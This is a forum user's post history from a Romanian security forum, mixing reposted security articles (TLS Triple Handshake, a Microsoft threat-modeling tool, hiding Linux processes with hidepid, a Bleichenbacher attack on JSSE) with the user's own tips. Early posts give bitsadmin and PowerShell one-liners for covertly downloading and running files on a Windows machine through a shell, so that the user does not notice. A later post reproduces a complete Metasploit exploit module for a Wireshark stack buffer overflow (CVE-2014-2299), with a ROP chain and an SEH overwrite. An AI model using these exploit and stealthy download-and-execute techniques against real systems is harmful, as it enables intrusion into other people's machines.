Nytro
Administrators · Posts: 18715 · Days Won: 701
Everything posted by Nytro

  1. It opens the link in the browser. The idea, of course, is that the user should not realize a file is being downloaded to their computer. And not all files on all browsers are downloaded automatically and placed in Downloads. As a note regarding "bitsadmin": the HTTP server needs to be a proper one, one that supports byte-range requests and does not respond with HTTP 405. I mention this because I installed two silly mini HTTP servers and they did not work. With Apache it's fine. So everyone understands, the method is for the case where: 1. you have shell access as some user (that is, command-line access, you can execute commands); 2. you can only execute Windows commands, you have no other files you can drop on the machine; 3. the user must not find out in any way that something strange is happening on their computer; 4. you don't want to complicate things by writing dozens of commands just to download a file. PS: This way you can do a "Download & Execute" with 2 lines of code.
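The byte-range requirement above can be checked before relying on bitsadmin. A minimal sketch (mine, not from the original post; the function name and the dict-based response shape are illustrative) that classifies a server's response to a GET carrying a `Range: bytes=0-0` header:

```python
def bitsadmin_friendly(status_code, headers):
    """Decide, from a response to a GET with 'Range: bytes=0-0',
    whether bitsadmin is likely to work against this server."""
    if status_code == 405:      # method not allowed -> bitsadmin fails
        return False
    if status_code == 206:      # partial content -> ranges supported
        return True
    # A 200 that ignored the Range header: only usable if the server
    # at least advertises byte-range support.
    return headers.get("Accept-Ranges", "none").lower() == "bytes"

print(bitsadmin_friendly(206, {}))                          # True
print(bitsadmin_friendly(405, {}))                          # False
print(bitsadmin_friendly(200, {"Accept-Ranges": "bytes"}))  # True
```

This matches the observation in the post: Apache answers range requests with 206, while minimal HTTP servers often reply 200 without range support or reject the request with 405.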
  2. Another option, with PowerShell, but I think it only works on Windows 7 and Windows 8: powershell -Command "(New-Object Net.WebClient).DownloadFile('http://www.foo.com/package.zip', 'package.zip')" @Kalashnikov: that way you also get Firefox. But not when you only have a shell, i.e. when you can only execute commands.
  3. Hi, in case you ever need a quick way to download a file onto a Windows PC where you have a shell: bitsadmin.exe /transfer "JobName" http://download.url/here.exe C:\destination\here.exe I found it here: Windows batch file file download from a URL - Stack Overflow
  4. A use-after-free, and VGX.dll, which is probably not compiled with ASLR support, is used to bypass DEP and ASLR.
  5. @CoffeeMan, it was actually reopened recently.
  6. Fun stuff _|_
  7. [h=3]Attack of the Week: Triple Handshakes (3Shake)[/h]

The other day Apple released a major security update that fixes a number of terrifying things that can happen to your OS/X and iOS devices. You should install it. Not only does this fix a possible remote code execution vulnerability in the JPEG parser (!), it also patches a TLS/SSL protocol bug known as the "Triple Handshake" vulnerability. And this is great timing, since Triple Handshakes are something I've been meaning (and failing) to write about for over a month now. But before we get there: a few points of order.

First, if Heartbleed taught us one thing, it's that when it comes to TLS vulnerabilities, branding is key. Henceforth, and with apologies to Bhargavan, Delignat-Lavaud, Pironti, Fournet and Strub (who actually discovered the attack*), for the rest of this post I will be referring to the vulnerability simply as "3Shake". I've also taken the liberty of commissioning a logo. I hope you like it.

On a more serious note, 3Shake is not Heartbleed. That's both good and bad. It's good because Heartbleed was nasty and 3Shake really isn't anywhere near as dangerous. It's bad since, awful as it was, Heartbleed was only an implementation vulnerability -- and one in a single TLS library to boot. 3Shake represents a novel and fundamental bug in the TLS protocol.

The final thing you should know about 3Shake is that, according to the cryptographic literature, it shouldn't exist. You see, in the last few years there have been at least four major crypto papers purporting to prove the TLS protocol secure. The existence of 3Shake doesn't make those results wrong. It may, however, indicate that cryptographers need to think a bit more about what 'secure' and 'TLS' actually mean. For me, that's the most fascinating implication of this new attack.

I'll proceed with the usual 'fun' question-and-answer format I save for this sort of thing.

What is TLS and why should you care?
Since you're reading this blog, you probably already know something about TLS. You might even realize how much of our infrastructure is protected by this crazy protocol. In case you don't: TLS is a secure transport protocol that's designed to establish communications between two parties, who we'll refer to as the Client and the Server.

The protocol consists of two sub-protocols called the handshake protocol and the record protocol. The handshake is intended to authenticate the two communicating parties and establish shared encryption keys between them. The record protocol uses those keys to exchange data securely.

For the purposes of this blog post, we're going to focus primarily on the handshake protocol, which has (at least) two major variants: the RSA handshake and the Diffie-Hellman handshake (ECDHE/DHE). These are illustrated below.

[Figure: Simplified description of the TLS handshakes. Top: RSA handshake. Bottom: Diffie-Hellman handshake.]

As much as I love TLS, the protocol is a hot mess. For one thing, it inherits a lot of awful cryptography from its ancient predecessors (SSLv1-3). For another, it's only really beginning to be subjected to rigorous, formal analysis. All this means we're just now starting to uncover some of the bugs that have been present in the protocol since it was first designed. And we're likely to discover more! That's partly because this analysis is at a very early stage. It's also partly because, from an analysts' point of view, we're still trying to figure out exactly what the TLS handshake is supposed to do.

Well, what is the TLS handshake supposed to do?

Up until this result, we thought we had a reasonable understanding of the purpose of the TLS handshake.
It was intended to authenticate one or both sides of the connection, then establish a shared cryptographic secret (called the Master Secret) that could be used to derive cryptographic keys for encrypting application data.

The first problem with this understanding is that it's a bit too simple. There isn't just one TLS handshake, there are several variants of it. Worse, multiple different handshake types can be used within a single connection. The standard handshake flow is illustrated -- without crypto -- in the diagram below.

In virtually every TLS connection, the server authenticates to the client by sending a public key embedded in a certificate. The client, for its part, can optionally authenticate itself by sending a corresponding certificate and proving it has the signing key. However this client authentication is by no means common. Many TLS connections are authenticated only in one direction.

[Figure: Common TLS handshakes. Left: only server authenticates. Right: client and server both authenticate with certificates.]

TLS also supports a "renegotiation" handshake that can switch an open connection from one mode to the other. This is typically used to change a connection that was authenticated only in one direction (Server->Client) into a connection that's authenticated in both directions. The server usually initiates renegotiation when the client has e.g., asked for a protected resource.

[Figure: Renegotiating a session. A new handshake causes the existing connection to be mutually authenticated.]

Renegotiation has had problems before.
Back in 2009, Ray and Dispensa showed that a man-in-the-middle attacker could actually establish a (non-authenticated) connection with some server; inject some data; and when the server asks for authentication, the attacker could then "splice" on a real connection with an authorized client by simply forwarding the new handshake messages to the legitimate client. From the server's point of view, both communications would seem to be coming from the same (now authenticated) person:

[Figure: Ray/Dispensa attack from 2009. The attacker first establishes an unauthenticated connection and injects some traffic ("drop table *"). When the server initiates a renegotiation for client authentication, the attacker forwards the new handshake messages to an honest client Alice who then sends real traffic. Since the handshakes are not bound together, Bob views this as a single connection to one party.]

To fix this, a "secure renegotiation" band-aid to TLS was proposed. The rough idea of this extension was to 'bind' the renegotiation handshake to the previous handshake, by having the client present the "Finished" message of the previous handshake. Since the Finished value is (essentially) a hash of the Master Secret and the (hash of) the previous handshake messages, this allows the client to prove that it -- not an attacker -- truly negotiated the previous connection.

All of this brings us back to the question of what the TLS handshake is supposed to do. You see, the renegotiation band-aid now adds some pretty interesting new requirements to the TLS handshake. For one thing, the security of this extension depends on the idea that (1) no two distinct handshakes will happen to use the same Master Secret, and (2) that no two handshakes will have the same handshake messages, ergo (3) no two handshakes will have the same Finished message.
Intuitively, this seemed like a pretty safe thing to assume -- and indeed, many other systems that do 'channel binding' on TLS connections also make this assumption. The 3Shake attack shows that this is not safe to assume at all.

So what's the problem here?

It turns out that TLS does a pretty good job of establishing keys with people you've authenticated. Unfortunately there's a caveat. It doesn't truly guarantee the established key will be unique to your connection. This is a pretty big violation of the assumptions that underlie the "secure renegotiation" fix described above.

For example: imagine that Alice is (knowingly) establishing a TLS connection to a server Mallory. It turns out that Mallory can simultaneously -- and unknown to Alice -- establish a different connection to a second server Bob. Moreover, if Mallory is clever, she can force both connections to use the same "Master Secret" (MS).

[Figure: Mallory creates two connections that use the same Master Secret.]

The first observation of the 3Shake attack is that this trick can be played if Alice supports either the RSA or DHE handshakes -- or both (it does not seem to work on ECDHE). Here's the RSA version:**

[Figure: RSA protocol flow from the triple handshake attack (source). The attacker is in the middle, while the client and server are on the left/right respectively. MS is computed as a function of (pms, cr, sr), which are identical in both handshakes.]

So already we have a flaw in the logic undergirding secure renegotiation. The Master Secret (MS) values are not necessarily distinct between different handshakes. Fortunately, the above attack does not let us resurrect the Ray/Dispensa injection attack.
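For reference, the caption's formula is the standard TLS 1.2 derivation from RFC 5246: MS = PRF(pms, "master secret", client_random || server_random), where the PRF is the HMAC-SHA256-based P_hash. Here is a small sketch of that derivation (mine, not the researchers' code; earlier TLS versions use an MD5/SHA-1 construction instead), showing why identical (pms, cr, sr) on Mallory's two connections yield an identical Master Secret:

```python
import hmac
import hashlib

def p_sha256(secret, seed, n):
    # P_hash from RFC 5246, section 5: HMAC-SHA256 chaining A(i)
    out, a = b"", seed
    while len(out) < n:
        a = hmac.new(secret, a, hashlib.sha256).digest()
        out += hmac.new(secret, a + seed, hashlib.sha256).digest()
    return out[:n]

def master_secret(pms, client_random, server_random):
    # MS = PRF(pms, "master secret", cr || sr), truncated to 48 bytes
    return p_sha256(pms, b"master secret" + client_random + server_random, 48)

# Mallory re-encrypts the same pms for Bob and echoes Alice's cr and
# Bob's sr on both connections -> both handshakes derive the same MS:
ms_alice_mallory = master_secret(b"\x03\x03" + b"P" * 46, b"C" * 32, b"S" * 32)
ms_mallory_bob   = master_secret(b"\x03\x03" + b"P" * 46, b"C" * 32, b"S" * 32)
assert ms_alice_mallory == ms_mallory_bob and len(ms_alice_mallory) == 48
```

Note what is absent from the inputs: nothing about the certificates or the rest of the transcript, which is exactly the gap the attack exploits.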
While the attacker has tricked the client into using a specific MS value, the handshake Finished messages -- which the client will attach to the renegotiation handshake -- will not be the same in both handshakes. That's because (among other things) the certificates sent on each connection were very different, hence the handshake hashes are not identical. In theory we're safe.

But here is where TLS gets awesome. You see, there is yet another handshake I haven't told you about. It's called the "session resumption handshake", and it allows two parties who've previously established a master secret (and still remember it) to resume their session with new encryption keys. The advantage of resumption is that it uses no public-key cryptography or certificates at all, which is supposed to make it faster.

It turns out that if an attacker knows the previous MS and has caused it to be the same on both sides, it can now wait until the client initiates a session resumption. Then it can replay messages between the client and server in order to update both connections with new keys:

[Figure: An attacker replays the session resumption handshake to ensure the same key on both sides. Note that the handshake messages are identical in both connections. (authors of source)]

Which brings us to the neat thing about this handshake. Not only is the MS the same on both connections, but both connections now see exactly the same (resumption) handshake messages. Hence the hash of these handshakes will be identical, which means in turn that their "Finished" message will be identical.
By combining all of these tricks, a clever attacker can pull off the following -- and absolutely insane -- "triple handshake" injection attack:

[Figure: Triple handshake attack. The attacker mediates two handshakes that give the same MS on both sides, but two different handshake hashes. The resumption handshake leaves the same MS and an identical handshake hash on both sides. This means that the Finished message from the resumption handshake will be the same for the connections on either side of the attacker. Now he can hook up the two without anyone noticing that he previously injected traffic.]

In the above scenario, an attacker first runs a (standard) handshake to force both sides of the connection to use the same MS. It then causes both sides to perform session resumption, which results in both sides using the same MS and having the same handshake hash and Finished messages on both sides. When the server initiates renegotiation, the attacker can forward the third (renegotiation) handshake on to the legitimate client as in the Ray/Dispensa attack -- secure in the knowledge that both client and server will expect the same Finished token. And that's the ballgame.

What's the fix?

There are several, and you can read about them here. One proposed fix is to change the derivation of the Master Secret such that it includes the handshake hash. This should wipe out most of the attacks above. Another fix is to bind the "session resumption" handshake to the original handshake that led to it.

Wait, why should I care about injection attacks?

You probably don't, unless you happen to be one of the critical applications that relies on the client authentication and renegotiation features of TLS.
In that case, like most applications, you probably assumed that a TLS connection opened with a remote user was actually from that user the whole time, and not from two different users. If you -- like most applications -- made that assumption, you might also forget to treat the early part of the connection (prior to client authentication) as a completely untrusted bunch of crap. And then you'd be in a world of hurt.

But don't take my word for it. There's video! (See here for the source, background and details.)

What does this have to do with the provable security of TLS?

Of all the questions 3Shake raises, this one is the most interesting. As I mentioned earlier, there have been several recent works that purport to prove things about the security of TLS. They're all quite good, so don't take any of this as criticism. However, they also didn't find this attack. Why is that?

The first reason is simple: many of these works analyze only the basic TLS handshake, or they omit at least one of the possible handshakes (e.g., resumption). This means they don't catch the subtle interactions between the resumption handshake, the renegotiation handshake, and extensions -- all of which are the exact ingredients that make most TLS attacks possible.

The second problem is that we don't quite know what standard we're holding TLS to. For example, the common definition of security for TLS is called "Authenticated and Confidential Channel Establishment" (ACCE). Roughly speaking this ensures that two parties can establish a channel and that nobody will be able to determine what data is being sent over said channel.

The problem with ACCE is that it's a definition that was developed specifically so that TLS could satisfy it. As a result, it's necessarily weak. For example, ACCE does not actually require that each handshake produces a unique Master Secret -- one of the flaws that enables this attack -- because such a definition was not possible to achieve with the existing TLS protocol.
In general this is what happens when you design a protocol first and prove things about it later.

What's the future for TLS? Can't we throw the whole thing out and start over again?

Sure, go ahead and make TLS Rev 2. It can strip out all of this nonsense and start fresh. But before you get cocky, remember -- all these crazy features in TLS were put there for a reason. Someone wanted and demanded them. And sadly, this is the difference between a successful, widely-used protocol and your protocol. Your new replacement for TLS might be simple and wonderful today, but that's only because nobody uses it. Get it out into the wild and before long it too will be every bit as crazy as TLS.

Notes:

* An earlier version of this post incorrectly identified the researchers who discovered the attack.

** The Diffie-Hellman (DHE) version is somewhat more clever. It relies on the attacker manipulating the D-H parameters such that they will force the client to use a particular key. Since DHE parameters sent down from the server are usually 'trusted' by TLS implementations, this trick is relatively easy to pull off.

Posted by Matthew Green at 9:13 AM

Sursa: A Few Thoughts on Cryptographic Engineering: Attack of the Week: Triple Handshakes (3Shake)
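The first fix described in the post (mixing the handshake hash into the Master Secret derivation) was later standardized as the TLS extended master secret (RFC 7627): MS = PRF(pms, "extended master secret", session_hash). A sketch of the idea (mine, not the researchers' code; the transcript byte strings are placeholders), showing that once the transcript enters the derivation, Mallory's two connections no longer share a Master Secret even with identical pms and randoms:

```python
import hmac
import hashlib

def p_sha256(secret, seed, n):
    # P_hash from RFC 5246: HMAC-SHA256 chaining
    out, a = b"", seed
    while len(out) < n:
        a = hmac.new(secret, a, hashlib.sha256).digest()
        out += hmac.new(secret, a + seed, hashlib.sha256).digest()
    return out[:n]

def extended_master_secret(pms, handshake_messages):
    # RFC 7627: seed is the session hash (hash of the full transcript
    # up to ClientKeyExchange) instead of cr || sr.
    session_hash = hashlib.sha256(handshake_messages).digest()
    return p_sha256(pms, b"extended master secret" + session_hash, 48)

# Same pms on both of Mallory's connections, but the transcripts differ
# (different certificates), so the derived master secrets differ too:
ms_client_side = extended_master_secret(b"A" * 48, b"transcript-with-Mallory-cert")
ms_server_side = extended_master_secret(b"A" * 48, b"transcript-with-Alice-cert")
assert ms_client_side != ms_server_side
```

Because the certificates are part of the transcript, the unknown-key-share step of 3Shake no longer produces a shared MS, which is precisely what the proposed fix was meant to guarantee.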
  8. [h=1]Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow[/h]

# Exploit Title: Wireshark 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow
# Date: 24/04/2014
# Exploit Author: j0sm1
# Vendor Homepage: www.wireshark.org
# Software Link: http://wireshark.askapache.com/download/win32/all-versions/
# Version: < 1.8.12/1.10.5
# Tested on: Windows XP SP3
# CVE: CVE-2014-2299
# Metasploit URL module: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb
#
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow',
      'Description' => %q{
        This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
        by generating a malicious file.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Wesley Neelen', # Discovery vulnerability
        'j0sm1',         # Exploit and msf module
      ],
      'References' => [
        [ 'CVE', '2014-2299' ],
        [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ],
        [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ],
        [ 'URL', 'http://www.securityfocus.com/bid/66066/info' ]
      ],
      'DefaultOptions' => { 'EXITFUNC' => 'process' },
      'Payload' => {
        'BadChars'       => "\xff",
        'Space'          => 600,
        'DisableNops'    => 'True',
        'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200
      },
      'Platform' => 'win',
      'Targets' => [
        [ 'WinXP SP3 Spanish (bypass DEP)',
          {
            'OffSet'  => 69732,
            'OffSet2' => 70476,
            'Ret'     => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16)
            'jmpesp'  => 0x68e2bfb9,
          }
        ],
        [ 'WinXP SP2/SP3 English (bypass DEP)',
          {
            'OffSet2' => 70692,
            'OffSet'  => 70476,
            'Ret'     => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module
            'jmpesp'  => 0x68e2bfb9,
          }
        ],
      ],
      'Privileged' => false,
      'DisclosureDate' => 'Mar 20 2014'
    ))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'pcap file', 'mpeg_overflow.pcap' ]),
      ], self.class)
  end

  def create_rop_chain()
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll]
      0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x00000201, # 0x00000201-> ebx
      0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0]
      0x00000040, # 0x00000040-> edx
      0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x668242b9, # &Writable location [libgnutls-26.dll]
      0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll]
      0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
      0x90909090, # nop
      0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
    ].flatten.pack("V*")
    return rop_gadgets
  end

  def exploit
    print_status("Creating '#{datastore['FILENAME']}' file ...")

    ropchain = create_rop_chain
    magic_header = "\xff\xfb\x41" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure

    # Here we build the packet data
    packet = rand_text_alpha(883)
    packet << "\x6c\x7d\x37\x6c" # NOP RETN
    packet << "\x6c\x7d\x37\x6c" # NOP RETN
    packet << ropchain
    packet << payload.encoded # Shellcode
    packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)

    # 0xff is a badchar for this exploit, so we can't make a jump back with jmp $-2000.
    # After nseh and seh we have no space, so we have to jump to another location.

    # When the file is opened from the command line. This is the NSEH/SEH overwrite.
    packet << make_nops(4) # nseh
    packet << "\x6c\x2e\xe0\x68" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN
    packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk

    # When the file is opened with the GUI. This is the NSEH/SEH overwrite.
    packet << make_nops(4) # nseh
    # seh -> ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] **
    packet << "\x55\x59\x80\x6b"

    print_status("Preparing payload")
    filecontent = magic_header
    filecontent << packet
    print_status("Writing payload to file, " + filecontent.length.to_s() + " bytes")
    file_create(filecontent)
  end
end

Sursa: Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow
  9. @em is one of the leaders of Anonymous. He's a good guy, a Reckon fan. There was also Black death, but due to health (weight) problems he retired. Unfortunately he did not also retire from the dining halls. Sent from my P5_Quad using Tapatalk
  10. SecurityFocus: vBulletin Multiple Cross Site Scripting Vulnerabilities IBM ISS: ISS X-Force Database: vbulletin-multiple-scripts-xss(92664): vBulletin multiple scripts cross-site scripting SCIP: vBulletin up to 5.1.1 Alpha 9 cross site scripting The bums at exploit-db still haven't added it. Someone should let them know Easter has passed.
  11. If you have time on your hands, you enjoy it and want to learn Linux, want to get familiar with compiling sources or even the kernel, to understand how it works and to be able to configure a Linux system exactly the way you want, try Slackware. Side effects: swearing, frayed nerves, foaming at the mouth, broken keyboards. But it's worth it.
  12. Facilitating access to pirated materials? Huh? Where's the logic in that? By that reasoning they should also shut down weapons factories for facilitating murder.
  13. [h=3]Introducing Microsoft Threat Modeling Tool 2014[/h]

Today, we are excited to announce the general availability of a new version of a very popular Security Development Lifecycle tool – Microsoft Threat Modeling Tool 2014. It's available as a free download from Microsoft Download Center here.

Threat modeling is an invaluable part of the Security Development Lifecycle (SDL) process. We have discussed in the past how applying a structured approach to threat scenarios during the design phase of development helps teams more effectively and less expensively identify security vulnerabilities, determine risks from those threats, and establish appropriate mitigations. For those who would like more of an introduction to threat modeling, please visit Threat Modeling: Uncover Security Design Flaws Using the STRIDE Approach.

But, without further ado, let's dig into the fun stuff – the new features of Threat Modeling Tool 2014.

Microsoft Threat Modeling Tool 2014 - Changes and New Features

Microsoft announced the general availability of the SDL Threat Modeling Tool v3.1.8 in 2011, which gave software development teams an approach to design their security systems following the threat modeling process. Microsoft Threat Modeling Tool 2014 introduces many improvements and new features; see the highlights below.

Figure 1. Microsoft Threat Modeling Tool 2014 Home Screen

NEW DRAWING SURFACE

One of our goals with this release is to provide a simplified workflow for building a threat model and help remove existing dependencies. You'll find an intuitive user interface with easy navigation between different modes. The new version of the tool has a new drawing surface and Microsoft Visio is no longer required to create new threat models. Using the Design View of the tool, you can create your data flow diagram using the included stencil set (see Figure 2).

Figure 2. Microsoft Threat Modeling Tool 2014 - Design View

MIGRATION FOR V3 THREAT MODELS

Threat modeling is an iterative process. Development teams create threat models which evolve over time as systems and threats change. We wanted to make sure the new tool supports this flow. Microsoft Threat Modeling Tool 2014 offers migration of threat models created with version 3.1.8, which allows an easy update to existing threat models of security system designs. (NOTE: For migrating threat models from v3.1.8 only, Microsoft Visio 2007 or later is required.) Threat models created with the v3 version of the tool (.tms format) can be migrated to the new format (.tm4) (see Figure 3).

Figure 3. Migrating v3 Threat Models

STRIDE PER INTERACTION

One of the key changes we are introducing is the update to threat generation logic. With previous versions of the tool we have taken the approach of using STRIDE per element. Microsoft Threat Modeling Tool 2014 uses STRIDE categories and generates threats based on the interaction between elements. We take into consideration the type of elements used on the diagram (e.g. processes, data stores etc.) and what type of data flows connect these elements. When in Analysis View, the tool will show the suggested threats for your data flow diagram in a simple grid (see Figure 4).

Figure 4. Microsoft Threat Modeling Tool 2014 – Analysis View

DEFINE YOUR OWN THREATS

Microsoft Threat Modeling Tool 2014 comes with a base set of threat definitions using STRIDE categories. This set includes only suggested threat definitions and mitigations which are automatically generated to show potential security vulnerabilities for your data flow diagram. You should analyze your threat model with your team to ensure you have addressed all potential security pitfalls. To offer more flexibility, Microsoft Threat Modeling Tool 2014 gives users the option to add their own threats related to their specific domain. This means users can extend the base set of threat definitions by authoring the provided XML format. For details on adding your own threats, see the Threat Modeling tool SDK. With this feature, we have higher confidence that our users can get the best possible picture of their threat landscape (see Figure 5).

Figure 5. Threat Model Definitions Grammar in Backus-Naur Form (BNF)

We hope these new enhancements in Microsoft Threat Modeling Tool 2014 will provide greater flexibility and help enable you to effectively implement the SDL process in your organization. Thank you to all who helped ship this release through internal and external feedback. Your input was critical to improving the tool and customer experience.

For more information and additional resources, visit:

Microsoft Security Development Lifecycle (SDL)
Uncover Security Design Flaws Using the STRIDE Approach
Getting Started with Threat Modeling: Elevation of Privilege (EoP) Game
Reinvigorate your Threat Modeling Process
Threat Models Improve Your Security Process
Threat Modeling: Designing for Security (BOOK)

Emil Karafezov is a Program Manager on the Secure Development Tools and Policies team at Microsoft. He's responsible for the Threat Modeling component of the Security Development Lifecycle (SDL).

Sursa: Introducing Microsoft Threat Modeling Tool 2014 - The Security Development Lifecycle - Site Home - MSDN Blogs
  14. Linux Security: How to hide processes from other users

Small and at the same time great article from Steve on http://www.debian-administration.org/. —

If you run a multi-user system it can increase security if you hide the display of running processes, and their arguments, which belong to other users. This helps avoid problems if users enter passwords on the command-line, and similar.

If you're running a recent kernel (version 3.2 or higher), you can achieve this benefit by mounting the /proc filesystem with the new hidepid option:

Value | Meaning
------|--------
0     | This is the default setting and gives you the default behaviour.
1     | A normal user would not see processes other than their own in ps, top etc., but would still be able to see process IDs beneath /proc.
2     | Users are only able to see their own processes (as with hidepid=1), and any other process IDs are hidden from them if they manually poke around beneath /proc.

It is worth noting that with the secure values set ("1" or "2") all processes remain visible to the root user.

If you decide you wish to enable this protection you can change the mount option interactively by running:

# mount -o remount /proc -o hidepid=2

To ensure this happens automatically at boot-time you can update your /etc/fstab file to read something like this:

proc /proc proc defaults,hidepid=2 0 0

With this in place a user will only see their own processes in the output of top, ps, etc.:

s-blog@www:~$ ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
s-blog     848 32483  0 08:55 pts/1    00:00:00 ps -ef
s-blog   32483 32482  0 08:54 pts/1    00:00:00 -bash

The root user will still see all processes though, for debugging purposes. According to a recent post from the Debian Security Team it seems likely that the hidepid option will be proposed as a default in the future.
Sursa: » Linuxaria – Everything about GNU/Linux and Open source Linux Security: How to hide processes from other users
  15. Digging Deep Into The Flash Sandboxes
Type: Video
Tags: Flash
Authors: Mark Vincent Yason, Paul Sabanal
Event: Black Hat USA 2012
Indexed on: Apr 17, 2014
URL: https://media.blackhat.com/us-12/video/us-12-Sabanal-Digging-Deep-Into-The-Flash-Sandboxes.mp4
File name: us-12-Sabanal-Digging-Deep-Into-The-Flash-Sandboxes.mp4
File size: 162.1 MB
MD5: 794e3c2b928a1135b2be260f59610bca
SHA1: b6ea828164ff98cb88fba008eff393ac18560071
  16. Easter Hack: Even More Critical Bugs in SSL/TLS Implementations

It's been some time since my last blog post - time for writing is rare. But today, I'm very happy that Oracle released the brand new April Critical Patch Update, fixing 37 vulnerabilities in our beloved Java (seriously, no kidding - Java is simply a great language!). With that being said, all vulnerabilities reported by my colleagues (credits go to Juraj Somorovsky, Sebastian Schinzel, Erik Tews, Eugen Weiss, Tibor Jager and Jörg Schwenk) and me are fixed, and I highly recommend patching as soon as possible if you are running a server powered by JSSE! Additional results on crypto hardware suffering from vulnerable firmware are omitted at this moment, because the patch(es) isn't/aren't available yet - details follow when the fix(es) is/are ready.

To keep this blog post as short as possible I will skip a lot of details, analysis and pre-requisites you need to know to understand the attacks mentioned in this post. If you are interested, use the link at the end of this post to get a much more detailed report.

Resurrecting Fixed Attacks

Do you remember Bleichenbacher's clever million question attack on SSL from 1998? It was believed to be fixed with the following countermeasure specified in the TLS 1.0 RFC:

"The best way to avoid vulnerability to this attack is to treat incorrectly formatted messages in a manner indistinguishable from correctly formatted RSA blocks. Thus, when it receives an incorrectly formatted RSA block, a server should generate a random 48-byte value and proceed using it as the premaster secret. Thus, the server will act identically whether the received RSA block is correctly encoded or not." – Source: RFC 2246

In simple words, the server is advised to create a random PreMasterSecret in case of problems during processing of the received, encrypted PreMasterSecret (structure violations, decryption errors, etc.).
The server must continue the handshake with the randomly generated PreMasterSecret and perform all subsequent computations with this value. This leads to a fatal Alert when checking the Finished message (because of different key material at client- and server-side), but it does not allow the attacker to distinguish valid from invalid (PKCS#1 v1.5 compliant and non-compliant) ciphertexts. In theory, an attacker gains no additional information on the ciphertext if this countermeasure is applied (correctly). Guess what? The fix itself can introduce problems: Different processing times caused by different code branches in the valid and invalid cases. What happens if we can trigger Exceptions in the code responsible for branching? If we could trigger different Exceptions, how would that influence the timing behaviour? Let's have a look at the second case first, because it is the easiest one to explain if you are familiar with Bleichenbacher's attack: Exploiting PKCS#1 Processing in JSSE A coding error in com.sun.crypto.provider.TlsPrfGenerator (missing array length check and incorrect decoding) could be used to force an ArrayIndexOutOfBoundsException during PKCS#1 processing. The Exception finally led to a general error in the JSSE stack which is communicated to the client in the form of an INTERNAL_ERROR SSL/TLS alert message. What can we learn from this? The alert message is only sent if we are already inside the PKCS#1 decoding code blocks! With this side channel Bleichenbacher's attack can be mounted again: An INTERNAL_ERROR alert message suggests a PKCS#1 structure that was recognized as such, but contained an error - any other alert message was caused by the different processing branch (the countermeasure against this attack). The side channel is only triggered if the PKCS#1 structure contains a specific structure. This structure is shown below. 
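The structure figure from the original post is not reproduced here. For orientation: after RSA decryption, a conformant TLS block must look like 0x00 0x02, followed by at least eight non-zero padding bytes, a 0x00 separator, and a 48-byte PreMasterSecret. A minimal Python sketch of such a conformance check (illustrative only, not JSSE's actual code; the function name is my own):

```python
def is_pkcs1_v15_conformant(block: bytes, key_bytes: int = 256) -> bool:
    """Check a decrypted RSA block against the TLS PKCS#1 v1.5 layout:
    0x00 0x02 || at least 8 non-zero padding bytes || 0x00 || 48-byte
    PreMasterSecret. Returns True only for a fully conformant block."""
    if len(block) != key_bytes:
        return False
    if block[0] != 0x00 or block[1] != 0x02:
        return False
    try:
        sep = block.index(0x00, 2)   # first 0x00 after the leading 0x00 0x02
    except ValueError:
        return False                 # no separator at all
    if sep - 2 < 8:                  # padding shorter than 8 bytes
        return False
    return len(block) - sep - 1 == 48  # exactly a 48-byte PreMasterSecret
```

Per the countermeasure quoted above, a server must behave identically whether this check passes or fails, substituting a random PreMasterSecret in the failing case.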
